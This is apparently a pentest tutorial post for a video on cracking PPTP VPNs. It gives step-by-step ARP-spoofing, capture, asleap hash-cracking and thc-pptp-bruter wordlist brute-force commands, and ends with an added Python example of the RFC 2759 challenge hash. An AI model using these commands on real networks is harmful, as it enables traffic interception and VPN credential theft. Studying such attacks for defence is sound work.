ilbr22

[Video] Cracking VPNs (asleap and THC-pptp-bruter) // Hacking PPTP VPNs

Links

Watch on-line: Watch Cracking VPNs (asleap and THC-pptp-bruter) | g0tmi1k Episodes | Blip

Download Video: asleap _ THC-pptp-bruter.mp4

Script (chap2asleap.py): Free Cloud Storage - MediaFire

What is this?

A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program.

This video demonstrates an offline (asleap) and online (THC-pptp-bruter) attack on MSCHAP v2 software VPN.

How does this work?

From wireshark (and a Man In The Middle attack), you can get "CHAP Challenge" and "CHAP Response". We can break these values down:

CHAP Challenge = Auth Challenge (16 bytes)

CHAP Response = Peer Challenge (16 bytes) and Peer Response (24 bytes)

After finding "Auth Challenge and Peer Challenge" we can add these to the username and hash (sha1) the result. This will generate the "Challenge".

Once we have the challenge, we can feed this into the asleap, along with CHAP Challenge.

This script does all the work for you (and more), it just needs the values from wireshark for it to work. As well as having the option for different styles of attack, you can either use a dictionary/wordlist or use 'Genkeys' to generate a look up file for asleap (which is recommended). Also by using this, you can automatically run asleap with your arguments.

What do I need?

> asleap

> Python

> The script - chap2asleap.py

> Wireshark

> VPN

> THC-pptp-bruter

Software

Name: asleap

Version: 2.2

Home Page: asleap - exploiting cisco leap

Download Link: http://www.willhackforsushi.com/code...asleap-2.2.tgz

Name: THC-pptp-bruter

Version: 0.1.4

Home Page: #!/bin/the hacker's choice - THC

Download Link: http://freeworld.thc.org/download.ph...r-0.1.4.tar.gz

Name: chap2asleap.py

Version: 0.1.1

Home Page: g0tmi1k

Download Link: Free Cloud Storage - MediaFire

How to use chap2asleap.py:

1.) chmod 755 chap2asleap.py

2.) python chap2asleap.py

Commands:

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth1 -t 10.0.0.3 10.0.0.9

arpspoof -i eth1 -t 10.0.0.9 10.0.0.3

wireshark -i eth1 -k

python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v

cd /pentest/passwords/wordlists
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3

Notes:

Song: Two Fingers - Keman Rhythm

Video length: 03:03

Capture length: 5:48

Blog Post: http://g0tmi1k.blogspot.com/2010/03/...2asleappy.html

Forum Post: http://www.backtrack-linux.org/forum....html#post7959

source: Cracking VPNs (asleap and THC-pptp-bruter)
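
The split and hash described under "How does this work?", as an added example that is not part of the original post or of chap2asleap.py. It follows the ChallengeHash definition in RFC 2759 (first 8 bytes of SHA-1 over Peer Challenge, Auth Challenge and username, in that order) and uses the username, challenge and response from the post's command line; the function names are assumptions.

```python
import hashlib

# Values copied from the post's chap2asleap.py command line (-u, -c, -r).
POST_USER = "g0tmi1k"
POST_CHALLENGE = "3fb0e397540e8aa3df5eb08b0053092c"
POST_RESPONSE = ("df7661696051401f7192726630558ac200000000000000003c"
                 "4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600")


def split_chap_response(response_hex):
    """Split the 49-byte MS-CHAPv2 Response value defined in RFC 2759."""
    raw = bytes.fromhex(response_hex)
    if len(raw) != 49:
        raise ValueError(f"MS-CHAPv2 response must be 49 bytes, got {len(raw)}")
    return {
        "peer_challenge": raw[0:16],   # chosen by the client
        "reserved": raw[16:24],        # must be zero
        "nt_response": raw[24:48],     # the 24-byte "Peer Response"
        "flags": raw[48],
    }


def challenge_hash(peer_challenge, auth_challenge, username):
    """RFC 2759 ChallengeHash(): first 8 bytes of SHA-1 over the three inputs."""
    if len(peer_challenge) != 16 or len(auth_challenge) != 16:
        raise ValueError("both challenges must be 16 bytes")
    data = peer_challenge + auth_challenge + username.encode("ascii")
    return hashlib.sha1(data).digest()[:8]


def observer_view(username, chap_challenge_hex, chap_response_hex):
    """Return what a passive observer of the handshake ends up holding."""
    fields = split_chap_response(chap_response_hex)
    if any(fields["reserved"]):
        raise ValueError("reserved bytes are not zero; capture may be damaged")
    auth = bytes.fromhex(chap_challenge_hex)
    challenge = challenge_hash(fields["peer_challenge"], auth, username)
    return {"challenge": challenge.hex(), "nt_response": fields["nt_response"].hex()}


if __name__ == "__main__":
    for name, value in observer_view(POST_USER, POST_CHALLENGE, POST_RESPONSE).items():
        print(f"{name}: {value}")
```

Both returned values come from the captured handshake alone, with the 8 reserved bytes and the trailing flags byte of the CHAP Response discarded along the way.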
